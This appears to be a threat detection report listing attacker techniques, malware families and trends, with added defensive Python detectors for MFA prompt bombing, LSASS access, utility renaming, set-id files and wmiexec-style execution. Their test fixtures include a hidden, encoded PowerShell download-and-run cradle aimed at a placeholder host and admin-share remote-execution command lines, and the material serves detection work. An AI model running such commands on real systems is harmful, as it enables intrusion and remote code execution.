Technique: Multi-Factor Authentication Request Generation
Adversaries abuse MFA requests to log into valuable systems that are protected by second factors of authentication. To the surprise of many, some MFA implementations are susceptible to relatively unsophisticated social engineering attacks that could allow an adversary to impersonate victims and bypass security controls. Highly privileged identities are particularly juicy targets for adversaries seeking […]
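The unsophisticated attack the entry alludes to is usually push fatigue: the adversary already holds the password and simply sends prompts until the user taps approve. Below is an added example (mine, not code from the Red Canary report) that finds that pattern in authentication logs. The log format, user names, 10-minute window and threshold of three rejected pushes are all assumptions made for the example.

```python
"""Added example, not code from the Red Canary report: flag MFA push-fatigue
("prompt bombing") in authentication logs. The log format, user names and
thresholds are assumptions made for this example."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, not real telemetry. One push prompt per line.
SAMPLE_LOG = """\
2022-10-03T08:01:05Z user=alice event=mfa_push result=approved
2022-10-03T22:14:02Z user=bob event=mfa_push result=denied
2022-10-03T22:14:40Z user=bob event=mfa_push result=denied
2022-10-03T22:15:11Z user=bob event=mfa_push result=timeout
2022-10-03T22:15:50Z user=bob event=mfa_push result=denied
2022-10-03T22:16:30Z user=bob event=mfa_push result=approved
2022-10-03T09:30:00Z user=carol event=mfa_push result=denied
2022-10-03T13:45:00Z user=carol event=mfa_push result=approved
"""

WINDOW = timedelta(minutes=10)   # assumed tuning values
THRESHOLD = 3                    # denied or timed-out pushes inside WINDOW

def parse_line(line):
    """'<ISO-8601 UTC> key=value ...' -> (timestamp, user, result)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), kv["user"], kv["result"]

def detect_push_fatigue(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return {user: finding} for users who received >= threshold pushes that
    were denied or timed out within one sliding window. The finding records
    whether an approval followed the burst, which is the case that matters:
    the adversary now holds a session as that user."""
    pushes = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, user, result = parse_line(line)
            pushes[user].append((ts, result))

    findings = {}
    for user, events in pushes.items():
        events.sort()
        rejected = [ts for ts, result in events if result != "approved"]
        for i in range(len(rejected)):
            j = i
            while j + 1 < len(rejected) and rejected[j + 1] - rejected[i] <= window:
                j += 1
            count = j - i + 1
            if count >= threshold:
                burst_end = rejected[j]
                approved_after = any(
                    result == "approved" and burst_end <= ts <= burst_end + window
                    for ts, result in events
                )
                findings[user] = {"rejected_pushes": count,
                                  "approved_after_burst": approved_after}
                break
    return findings

if __name__ == "__main__":
    for user, finding in detect_push_fatigue(SAMPLE_LOG).items():
        print(user, finding)
```

A burst that ends in an approval is the alert to page on; a burst with no approval is still worth a password reset, since the adversary had to know the password to trigger the prompts at all. Number-matching or FIDO2 authenticators remove the class of attack rather than detecting it.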
Technique: SMB/Windows Admin Shares
Windows Admin Shares are enabled by default to allow administrators and software to remotely manage hosts on an internal network using the SMB protocol. These shares give adversaries the ability to stage payloads for execution, move laterally throughout a network, and elevate their privilege level. As is often the case with legitimate operating system utilities, […]
Technique: Mark-of-the-Web Bypass
Windows uses the Mark-of-the-Web (MotW) to indicate that a file originated from the Internet, which gives Microsoft Defender SmartScreen an opportunity to perform additional inspection of the content. MotW also supplies the basis for the extra warning prompt shown when files with high-risk extensions are opened. MotW is applied to a file by appending a […]
Technique: Setuid and Setgid
Once an adversary gains access to a machine, they need to make sure they have enough permissions to persist, evade defensive controls, steal credentials, and more. Adversaries abuse setuid and setgid bits to elevate their privilege levels on macOS and Linux, potentially accessing both cloud-hosted and physical on-premises machines. With elevated privileges, adversaries can modify […]
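The defensive counterpart is an inventory of set-id files compared against a baseline, so that a newly dropped setuid copy of a shell stands out. The following is an added example (mine, not code from the report) that does that inventory over a directory tree. To stay self-contained it builds a throwaway fixture tree instead of scanning the root filesystem; the allowlist of expected binaries is a placeholder.

```python
"""Added example, not code from the report: enumerate files with the setuid
or setgid bit under a directory tree and report the ones missing from an
allowlist. The fixture tree and allowlist are constructed for the example;
a real audit walks / (roughly what `find / -perm /6000 -type f` does)."""
import os
import stat
import tempfile

def find_setid_files(root):
    """Return sorted (relative_path, kind) pairs for regular files under root
    whose mode carries S_ISUID and/or S_ISGID. Symlinks are not followed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            kinds = []
            if st.st_mode & stat.S_ISUID:
                kinds.append("setuid")
            if st.st_mode & stat.S_ISGID:
                kinds.append("setgid")
            if kinds:
                hits.append((os.path.relpath(path, root), "+".join(kinds)))
    return sorted(hits)

def unexpected_setid(root, allowlist):
    """Set-id files whose basename is not in the allowlist (a baseline of the
    binaries the platform legitimately ships with set-id bits)."""
    return [(p, kind) for p, kind in find_setid_files(root)
            if os.path.basename(p) not in allowlist]

def build_demo_tree():
    """Constructed fixture: a throwaway directory with one expected setuid
    file, one unexpected setuid+setgid file and one plain file."""
    root = tempfile.mkdtemp(prefix="setid_demo_")
    for name, mode in (("passwd", 0o4755), ("backdoor", 0o6755), ("notes.txt", 0o644)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)
    return root

if __name__ == "__main__":
    demo = build_demo_tree()
    print(find_setid_files(demo))
    print(unexpected_setid(demo, {"passwd", "sudo", "su"}))
```

Matching on basename alone is deliberately simple; a production baseline should key on full path and hash, and the scan should be repeated, since a set-id bit added to an existing binary (chmod u+s on an already-present copy of a shell) leaves no new file to notice.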
Technique: Gatekeeper Bypass
Adversaries attempt to bypass Apple’s Gatekeeper security checks in order to gain execution on a host. Since Gatekeeper’s introduction, the security control has hampered adversaries’ ability to execute untrusted code (i.e., code that does not conform to the system’s security policy). Adversaries may also circumvent the older File Quarantine feature and some of the high-level […]
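Both this entry and the Mark-of-the-Web Bypass entry above come down to a provenance marker that the operating system attaches to a downloaded file and that the bypass removes or never lets get written: on Windows the Zone.Identifier alternate data stream, on macOS the com.apple.quarantine extended attribute. The block below is an added example (mine, not code from the report) that parses both marker formats from constructed sample values and decides whether a file should be treated as an untrusted download. The URLs, timestamp and UUID are made up.

```python
"""Added example, not code from the report: parse the provenance markers
behind MotW (the Zone.Identifier alternate data stream on NTFS) and
Gatekeeper/File Quarantine (the com.apple.quarantine extended attribute)
and decide whether a file should be treated as an untrusted download.
Marker contents are constructed samples; the URLs and UUID are made up."""

# Constructed Zone.Identifier stream as a browser would write it.
ZONE_IDENTIFIER = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.test/downloads\r\n"
    "HostUrl=https://cdn.example.test/tool.zip\r\n"
)

# Constructed com.apple.quarantine value: flags;timestamp(hex);agent;uuid
QUARANTINE = "0083;63a1b2c4;Safari;8F3A2D7E-1B2C-4D5E-9F00-123456789ABC"

# URLZONE values used in ZoneId.
URLZONE = {0: "LocalMachine", 1: "Intranet", 2: "Trusted", 3: "Internet", 4: "Restricted"}

def parse_zone_identifier(text):
    """Parse the INI-style [ZoneTransfer] section into a dict; ZoneId becomes
    an int and ZoneName is added for readability."""
    section, out = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            out[key.strip()] = value.strip()
    if "ZoneId" in out:
        out["ZoneId"] = int(out["ZoneId"])
        out["ZoneName"] = URLZONE.get(out["ZoneId"], "Unknown")
    return out

def parse_quarantine(value):
    """Parse 'flags;timestamp;agent;uuid'. Flags are kept as an int; their
    meaning is not interpreted here."""
    parts = value.split(";")
    if len(parts) < 4:
        raise ValueError("malformed com.apple.quarantine value")
    return {"flags": int(parts[0], 16), "timestamp": int(parts[1], 16),
            "agent": parts[2], "uuid": parts[3]}

def is_untrusted_download(zone=None, quarantine=None):
    """True when the markers say the file came from outside the machine:
    a ZoneId of Internet (3) or Restricted (4), or any quarantine attribute.
    A file with no marker at all is the interesting negative: for a file that
    arrived from the Internet that is exactly what a MotW/quarantine bypass
    leaves behind."""
    if zone and zone.get("ZoneId", 0) >= 3:
        return True
    return quarantine is not None

if __name__ == "__main__":
    z = parse_zone_identifier(ZONE_IDENTIFIER)
    print(z, is_untrusted_download(zone=z))
    q = parse_quarantine(QUARANTINE)
    print(q, is_untrusted_download(quarantine=q))
```

On a live host the inputs come from `Get-Content -Path <file> -Stream Zone.Identifier` (or `Get-Item -Stream *`) on Windows and `xattr -p com.apple.quarantine <file>` on macOS. The check that matters for detection is not the marked file but the unmarked one: an executable sitting in a user's Downloads folder, recently created by a browser or archive utility, with no marker at all.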
Technique: Modify Registry
Because the registry is a generic database that Windows uses for myriad purposes, an adversary can use it for myriad purposes too. However, modifying the registry is usually a means to an end for executing other techniques. The following, non-exhaustive list comprises the various techniques that registry modification facilitates: Boot or Logon Autostart Execution […]
Technique: LSASS Memory
Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory. Upon starting up, LSASS contains valuable authentication data such as: encrypted passwords, NT hashes, […]
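Whatever the dumping tool, it has to open a handle to lsass.exe with an access mask that permits reading its memory, and that handle request is visible in process-access telemetry. The block below is an added example (mine, not code from the report) that triages such events. The records are constructed in the shape of Sysmon Event ID 10 fields (SourceImage, TargetImage, GrantedAccess, CallTrace); the allowlist of processes that legitimately open LSASS is a placeholder that a real deployment would derive from its own baseline.

```python
"""Added example, not code from the report: triage process-access telemetry
for handles to lsass.exe that could read its memory. The events are
constructed in the shape of Sysmon Event ID 10 fields (SourceImage,
TargetImage, GrantedAccess, CallTrace); the allowlist is a placeholder that
a real deployment would derive from its own baseline."""
import ntpath

# Access-mask bits (winnt.h) that let a caller read or tamper with a process.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
DANGEROUS = PROCESS_CREATE_THREAD | PROCESS_VM_READ | PROCESS_VM_WRITE

# Modules whose presence in the call stack indicates a minidump was taken.
DUMP_MODULES = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll")

# Placeholder allowlist of processes that legitimately open lsass.exe.
KNOWN_GOOD_SOURCES = {"csrss.exe", "wininit.exe", "msmpeng.exe", "lsass.exe"}

LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed events, not real telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF", "CallTrace": ""},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1400", "CallTrace": ""},            # query-only, benign
    {"SourceImage": r"C:\Users\Public\mk.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1FFFFF",
     "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d234|C:\\Windows\\System32\\comsvcs.dll+1c3a2"},
    {"SourceImage": r"C:\Users\Public\mk.exe", "TargetImage": r"C:\Windows\explorer.exe",
     "GrantedAccess": "0x1FFFFF", "CallTrace": ""},          # not lsass, ignored
]

def assess_process_access(event):
    """Return a finding dict for a suspicious handle to lsass.exe, else None."""
    target = ntpath.basename(event.get("TargetImage", "")).lower()
    if target != "lsass.exe":
        return None
    source = ntpath.basename(event.get("SourceImage", "")).lower()
    if source in KNOWN_GOOD_SOURCES:
        return None
    access = int(event.get("GrantedAccess", "0"), 16)
    if not access & DANGEROUS:
        return None  # e.g. 0x1400: query information only, very common and benign
    trace = event.get("CallTrace", "").lower()
    severity = "high" if any(m in trace for m in DUMP_MODULES) else "medium"
    return {"source": source, "access": hex(access), "severity": severity}

def scan(events):
    return [f for f in (assess_process_access(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Testing the mask for the read/write/create-thread bits rather than for exact values such as 0x1010 or 0x1FFFFF keeps the logic robust to tools that request slightly different masks. Allowlisting by image name is the weak point of this and every similar rule (see the Rename System Utilities entry below), so pair it with signer or hash checks on the source image.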
Technique: Rename System Utilities
Adversaries rename system utilities to circumvent security controls and bypass detection logic that’s dependent on process names and process paths. Renaming system utilities allows an adversary to take advantage of tools that already exist on the target system and prevents them from having to deploy as many additional payloads after initially gaining access. Renaming a […]
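The standard counter is to stop keying on the file name and compare it with the name the binary carries inside its own PE version resource (OriginalFileName), which process-creation telemetry such as Sysmon Event ID 1 records. The block below is an added example (mine, not code from the report) of that comparison over constructed records; the set of watched utilities is an assumption to extend to match your own coverage.

```python
"""Added example, not code from the report: compare the on-disk name of a
process with the OriginalFileName stored in its PE version resource, as
recorded by process-creation telemetry (Sysmon Event ID 1 carries this
field). Records are constructed; the list of watched utilities is an
assumption, extend it to match your own detection coverage."""
import ntpath

# Utilities whose renaming is worth an alert (assumed starting set).
WATCHED_ORIGINAL_NAMES = {
    "rundll32.exe", "cmd.exe", "powershell.exe", "regsvr32.exe", "mshta.exe",
    "certutil.exe", "wscript.exe", "cscript.exe", "msiexec.exe",
}

# Constructed process-creation records, not real telemetry.
SAMPLE_RECORDS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe", "OriginalFileName": "RUNDLL32.EXE"},
    {"Image": r"C:\Users\bob\Downloads\update.exe", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe"},
    {"Image": r"C:\Program Files\App\app.exe", "OriginalFileName": "app.exe"},
    {"Image": r"C:\Temp\x.exe", "OriginalFileName": ""},   # version info stripped
]

def renamed_utilities(records, watched=WATCHED_ORIGINAL_NAMES):
    """Return (image_path, original_name) for every record whose internal name
    is a watched utility but whose file name on disk differs from it."""
    hits = []
    for rec in records:
        original = rec.get("OriginalFileName", "").lower()
        if original not in watched:
            continue
        on_disk = ntpath.basename(rec.get("Image", "")).lower()
        if on_disk != original:
            hits.append((rec["Image"], original))
    return hits

def missing_version_info(records):
    """Executables with no OriginalFileName at all. Not malicious by itself,
    but an adversary who knows about the check above can strip the version
    resource, so these deserve a hash or signer lookup instead."""
    return [rec["Image"] for rec in records if not rec.get("OriginalFileName")]

if __name__ == "__main__":
    print(renamed_utilities(SAMPLE_RECORDS))
    print(missing_version_info(SAMPLE_RECORDS))
```

The comparison is case-insensitive because Microsoft's own binaries are inconsistent about the casing of OriginalFileName (RUNDLL32.EXE versus Cmd.Exe). Expect a handful of legitimate mismatches from installers that repackage system tools; baseline those by path and signer rather than by widening the exclusion to a whole name.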
Technique: Service Execution
Why do adversaries abuse Service Execution? All production operating systems have one thing in common: a mechanism to run a program or service continuously. On Windows, such a program is referred to as a “service,” and in the Unix/Linux world, such a program is often referred to as a “daemon.” Regardless of what operating system […]
Technique: Process Injection
Why do adversaries use Process Injection? Note: Process Injection comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Process Injection is a versatile technique that adversaries leverage to perform a wide range of malicious activity. […]
Technique: Ingress Tool Transfer
Why do adversaries use Ingress Tool Transfer? Note: Ingress Tool Transfer has no sub-techniques. Administrative tooling and other native operating system binaries offer adversaries a rich array of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform […]
Technique: Rundll32
Why do adversaries use Rundll32? Like other prevalent ATT&CK techniques, Rundll32 is a native Windows process and a functionally necessary component of the Windows operating system that can’t be blocked or disabled without breaking things. Adversaries typically abuse Rundll32 because it makes it hard to differentiate malicious activity from normal operations. More often than not, […]
Technique: Obfuscated Files or Information
Why do adversaries obfuscate files and information? Note: T1027 comprises multiple sub-techniques, but we largely map our detection analytics to the parent. As such, this section focuses generally on the overall technique and not on any individual sub-techniques. Adversaries employ obfuscation to evade simple, signature-based detection analytics and to impede analysis. Since software and IT […]
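The most common form this takes on Windows endpoints is a PowerShell command line whose script is passed through -EncodedCommand as Base64 of UTF-16LE text, so that nothing in the visible command line matches a signature. The block below is an added example (mine, not code from the report) that recovers the script and scores it for the usual download-cradle and obfuscation markers. The sample command line is constructed inside the block, and the indicator list is an assumption.

```python
"""Added example, not code from the report: recover the script hidden behind
PowerShell's -EncodedCommand switch (Base64 of UTF-16LE text, accepted under
any unambiguous prefix such as -e, -ec or -enc) and score it for common
obfuscation and download-cradle markers. The sample command line is
constructed inside the block; the indicator list is an assumption."""
import base64
import re

# "-e", "-ec", "-enc", ... followed by a Base64 blob.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})")

# Substrings worth counting once the script is in the clear (assumed set).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
              "-join", "[char]", "bypass", "hidden", "webclient")

def extract_encoded_command(cmdline):
    """Return the decoded script for the first valid -EncodedCommand, or None."""
    for match in ENCODED_FLAG.finditer(cmdline):
        flag, blob = match.group(1).lower(), match.group(2)
        if not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return None

def score_script(text):
    """Sorted list of indicators present in text (case-insensitive)."""
    lowered = text.lower()
    return sorted(i for i in INDICATORS if i in lowered)

def analyze_command_line(cmdline):
    decoded = extract_encoded_command(cmdline)
    visible = cmdline if decoded is None else decoded + " " + cmdline
    return {"encoded": decoded is not None, "decoded": decoded,
            "indicators": score_script(visible)}

def make_sample():
    """Constructed sample: a download cradle wrapped the way an obfuscated
    loader would launch it. Returns (command_line, plaintext_script)."""
    script = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return "powershell.exe -NoP -W Hidden -Enc " + blob, script

if __name__ == "__main__":
    cmd, _ = make_sample()
    print(analyze_command_line(cmd))
```

One layer of decoding is rarely the end: the decoded text often contains another FromBase64String call, string concatenation or a -join over a character array, so treat the indicators as a reason to keep peeling rather than as a verdict. Script Block Logging (Event ID 4104) records the script after PowerShell itself has decoded it, which sidesteps most of this work where it is enabled.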
Technique: Windows Management Instrumentation
Why do adversaries use WMI? Like many of the threats highlighted in this report, WMI is a native Windows feature that can be used on local or remote systems. Administrators regularly use WMI to configure systems, execute processes or scripts, and automate tasks. What makes WMI useful to administrators also makes it attractive to adversaries. Note […]
Technique: PowerShell
PowerShell is a versatile and flexible automation and configuration management framework built on top of the .NET Common Language Runtime (CLR), which expands its capabilities beyond other common command-line and scripting languages. PowerShell is included by default in modern versions of Windows, where it’s widely and routinely used by system administrators to automate tasks, perform […]
Technique: Windows Command Shell
Windows Command Shell is the native command-line interpreter (CLI) across every version of the Windows operating system. As utilitarian as it is ubiquitous, Windows Command Shell is one of the primary ways that adversaries interact with compromised systems. Unlike its more sophisticated and capable cousin, PowerShell, Windows Command Shell’s native feature set—i.e., commands that may […]
Threat: PlugX
PlugX is a malware family observed in intrusions attributed to multiple operators at least as far back as 2008. Although researchers largely attribute compromises involving PlugX to espionage operators with ties to Chinese interests, notably Mustang Panda (which overlaps with TA416 and RedDelta), there is speculation that PlugX source code has been circulated online […]
Threat: Raspberry Robin
Red Canary started tracking a cluster of worm-like activity in September 2021 that we called Raspberry Robin. We shared our observations on this cluster in a blog post published in May 2022. Following our blog post, other security researchers shared their observations and research findings, expanding the community’s understanding of Raspberry Robin. Since our initial […]
Threat: Gootloader
Gootloader is a JScript-based malware family that typically leverages SEO poisoning and compromised websites to lure victims into downloading a ZIP archive that poses as a document that the user has searched for. While we observed Gootloader detections in customer environments across multiple sectors in 2022, they almost always happened after victims accessed compromised websites […]
Threat: AdSearch
In early January 2022, multiple threat researchers began tweeting about a new threat, dubbed ChromeLoader, delivered via malvertising links that served a malware dropper packaged in an ISO image. Within the ISO, the ChromeLoader payload consisted of a .NET assembly, often named `CS_installer.exe`, which in turn decoded and executed an obfuscated PowerShell script stored within […]
Threat: Emotet
Emotet is an advanced, modular trojan that primarily functions as a downloader or dropper of other malware. It’s disseminated through malicious email links or attachments that use branding familiar to the recipient. Emotet focuses on stealing user data and banking credentials, and opportunistically deploys itself to victims. Emotet is polymorphic, meaning it often evades typical […]
Threat: Yellow Cockatoo
Yellow Cockatoo is an activity cluster involving search engine poisoning to trick users into installing a .NET RAT with infostealer capabilities. First reported by Red Canary in 2020, Yellow Cockatoo has also garnered attention from other researchers, who track it under other names such as Jupyter and Solarmarker. After bursting onto the scene in 2020 […]
Threat: Gamarue
Gamarue, sometimes referred to as Andromeda or Wauchos, is a malware family used as part of a botnet. The variant of Gamarue that we observed most frequently in 2022 was a worm that spread primarily via infected USB drives. Gamarue has been used to spread other malware, steal information, and perform other activities such as […]
Threat: BloodHound
BloodHound is an open source tool that can be used to identify attack paths and relationships in an Active Directory (AD) environment. BloodHound made it into our top 10 threat rankings thanks to both testing activity and adversary use. It is popular among adversaries and testers because having information about an AD environment can enable […]
Threat: Cobalt Strike
Cobalt Strike continues to be a favorite post-exploitation tool for adversaries. At #8, it is the only post-exploitation framework to make the top 10. Ransomware operators in particular rely substantially on Cobalt Strike’s core functionalities as they seek to deepen their foothold in their victims’ environments. Its speed, flexibility, and advanced features are likely contributing […]
Threat: Mimikatz
Mimikatz is an open source credential-dumping utility that was initially developed in 2007 by Benjamin Delpy to abuse various Windows authentication components. While the initial v0.1 release was oriented towards abusing already well established “Pass The Hash” attacks, after expanding its library of abuse primitives, the tool was publicly released as Mimikatz v1.0 in 2011. […]
Threat: SocGholish
SocGholish is a malware family that leverages drive-by-downloads masquerading as software updates for initial access. Active since at least April 2018, SocGholish has been linked to the suspected Russian cybercrime group Evil Corp. As in past years, Red Canary observed SocGholish impacting a wide variety of industry verticals in 2022. We observed a spike in […]
Threat: Impacket
At its core, Impacket is a collection of Python libraries that plug into applications like vulnerability scanners, allowing them to work with Windows network protocols. These Python classes are used in multiple tools to facilitate command execution over Server Message Block (SMB) and Windows Management Instrumentation (WMI). Oftentimes the popular Python scripts `smbexec`, `wmiexec`, or […]
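The wmiexec.py and smbexec.py scripts mentioned here are also the most common way the SMB/Windows Admin Shares technique described earlier shows up in practice: with default settings both run the operator's command through cmd.exe and redirect its output to a file on ADMIN$ or C$ reached over the loopback address, so the tool can read the result back over SMB. The block below is an added example (mine, not code from the report or from Impacket) that classifies constructed process-creation records by that command-line shape and by the parent process that spawned the shell. The patterns reflect the tools' defaults, which an operator can change.

```python
"""Added example, not code from the report or from Impacket itself: spot the
command-line shape left by wmiexec.py- and smbexec.py-style remote execution,
which redirect command output to a file on an admin share reached over
loopback. The patterns reflect the tools' defaults (operators can change
them); the events are constructed."""
import ntpath
import re

# Output redirected to \\127.0.0.1\ADMIN$\__<...> or \\127.0.0.1\C$\__<...>
LOOPBACK_ADMIN_SHARE = re.compile(r"\\\\127\.0\.0\.1\\(ADMIN\$|C\$)\\__", re.IGNORECASE)

CMD = r"C:\Windows\System32\cmd.exe"

# Constructed process-creation records, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": CMD,
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1677000000.12 2>&1"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": CMD,
     "CommandLine": r"C:\Windows\system32\cmd.exe /Q /c echo dir ^> \\127.0.0.1\C$\__output 2^>^&1 "
                    r"> %TEMP%\execute.bat & C:\Windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": CMD,
     "CommandLine": r"cmd.exe /c dir \\fileserver\share > C:\Temp\list.txt"},
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": CMD,
     "CommandLine": r"cmd.exe /c gpupdate /force"},
]

def classify(event):
    """Return a label for events matching the loopback admin-share redirection,
    refined by the parent process that spawned the shell; None otherwise."""
    cmdline = event.get("CommandLine", "")
    match = LOOPBACK_ADMIN_SHARE.search(cmdline)
    if not match:
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    share = match.group(1).upper()
    if parent == "wmiprvse.exe":
        return f"wmiexec-like (WMI-spawned shell, output on {share})"
    if parent == "services.exe":
        return f"smbexec-like (service-spawned shell, output on {share})"
    return f"admin-share output redirection via loopback ({share}), parent {parent}"

def scan(events):
    findings = []
    for event in events:
        label = classify(event)
        if label:
            findings.append((label, event["CommandLine"]))
    return findings

if __name__ == "__main__":
    for label, cmdline in scan(SAMPLE_EVENTS):
        print(label, "<-", cmdline)
```

A WmiPrvSE.exe parent on its own is not suspicious (it is how WMI runs legitimate management scripts), which is why the fourth record is not flagged; it is the combination with the loopback admin-share redirection that is rare in normal administration. Operators who edit the output path or share name evade this rule, so it belongs beside coarser signals such as network logons from one source to many hosts' ADMIN$ shares (Windows Event ID 5140/5145).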
Threat: Qbot
Also known as “Qakbot,” the Qbot banking trojan has been active since at least 2007. Initially focused on stealing user data and banking credentials, Qbot’s functionality has expanded to incorporate features such as follow-on payload delivery, command and control (C2) infrastructure, and anti-analysis capabilities. Qbot is typically delivered via an email-based distribution model, and in […]
Trend: Adversary emulation and testing
Customers are testing more and emulating the same techniques that adversaries abuse, but differences in tooling and tradecraft can limit effectiveness. Threat emulation activity increased significantly in 2022, and customers mostly tested the same techniques we observed adversaries abusing in the wild. Despite this, our security operations team finds that differentiating test detections from real-world […]
Trend: Identity attacks
Adversaries are sparking all sorts of identity crises by intercepting MFA requests and other user authentication mechanisms. Users continue to be the weakest link in the initial chains of compromise we investigate. Virtual identities used by humans are the critical enabler of breaches that lead to intellectual property theft, ransomware, and cryptomining, to name just […]
Trend: Stealers
Stealer malware—such as RedLine, Raccoon, and Vidar—enabled some of the highest-profile breaches in 2022. The last few years have seen organizations embrace remote work and technologies that allow employees to work outside the traditional perimeter of an enterprise network. Technologies that allow this kind of work to occur include VPNs, remote access solutions, web applications, […]
Trend: Email threats
Spearphishing, Business Email Compromise (BEC), and Email Account Compromise (EAC) attacks continue to silently menace businesses across the globe, steadily outpacing damages inflicted by other attacks such as ransomware. Adversaries traditionally rely on social engineering schemes that allow them to trick unsuspecting users into facilitating payment fraud, disclosing sensitive information, or installing malware. Social engineering […]
Trend: Command and control frameworks
Commercial and open source post-exploitation frameworks save red teamers time on custom development and allow them to quickly change TTPs in their engagements. Not surprisingly, adversaries also find them attractive due to their ease of use and flexibility. Adversaries have long used open source and leaked versions of commercial frameworks, most notably Metasploit and Cobalt […]
Trend: Initial access tradecraft
In 2022 we saw major malware campaigns leverage vintage tradecraft in new ways, experimenting with delivery vehicles and file types in an attempt to evade detection. Weaponized Microsoft documents and malicious macros waned in favor of evil binaries hidden within nested layers of container files and compressed archives. Adversaries manipulated search engine ads and results […]
Trend: Ransomware
The ransomware landscape continued to shift in 2022. While some metrics suggested that ransomware was less prevalent, other metrics suggested that ransomware was more prevalent for specific sectors. The community observed new ransomware groups popping up, while others disappeared. Regardless of the exact numbers, ransomware continues to be one of the most pressing threats to […]